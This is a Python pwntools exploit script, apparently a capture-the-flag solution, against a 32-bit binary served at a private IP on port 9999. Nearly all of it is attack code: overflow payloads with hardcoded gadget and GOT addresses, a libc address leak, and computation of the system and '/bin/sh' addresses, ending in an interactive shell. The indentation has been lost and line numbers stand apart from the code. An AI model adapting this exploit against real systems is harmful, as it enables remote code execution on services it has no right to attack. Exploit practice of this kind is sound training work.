1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
| from pwn import *
context.log_level = "debug"
sh = 0
elf = ELF("pwn")
lib = ELF("libc6_2.23-0ubuntu10_i386.so")
#nc 172.29.9.107 9999
def pwn(ip,port,debug):
if(debug == 1):
sh = process("./pwn")
else:
sh = remote(ip,port)
pop3_ret = 0x08048699
pop2_ret = 0x0804869a
offset = 44
main_addr = 0x080485FF
payload = (offset-12) * 'a' + p32(0x0804A01C) + "2"*4 + "3"*4+ p32(main_addr)
sh.send(payload)
sh.recvuntil("Hello, ")
sh.send(payload)
sh.recvuntil("Hello, ")
payload = (offset-0x10) * "b"+"5"*4 +p32(0x0804A01C)+"7"*4+"8"*4 +p32(0x0804861D)
sh.send(payload)
sh.recvuntil(payload)
sh.send(payload)
sh.recvuntil(payload)
sh.recv(33)
libc = u32(sh.recv(4))
log.success("libc :" + hex(libc))
system = 0x08048559
binsh = libc - lib.symbols["__libc_start_main"] + next(lib.search("/bin/sh"))
log.success("binsh :"+hex(binsh))
log.success("system :"+hex(libc - lib.symbols["__libc_start_main"] + lib.symbols['system']))
input()
payload = (offset)*"a" + p32(0x08048450)
sh.send(payload)
payload = (offset-12) * 'a' + p32(binsh) + "2"*4 + "3"*4+ p32(0x080485FF)
sh.send(payload)
sh.recvuntil("Hello, ")
sh.send(payload)
sh.recvuntil("Hello, ")
payload = (offset-0x10) * "b"+"5"*4 +p32(binsh)+"7"*4+"8"*4 +p32(0x08048559)
sh.send(payload)
sh.recvuntil("Hello, ")
sh.sendline(payload)
sh.recvuntil("Hello,")
sh.interactive()
if __name__ == "__main__":
pwn("172.29.9.107",9999,0)
|
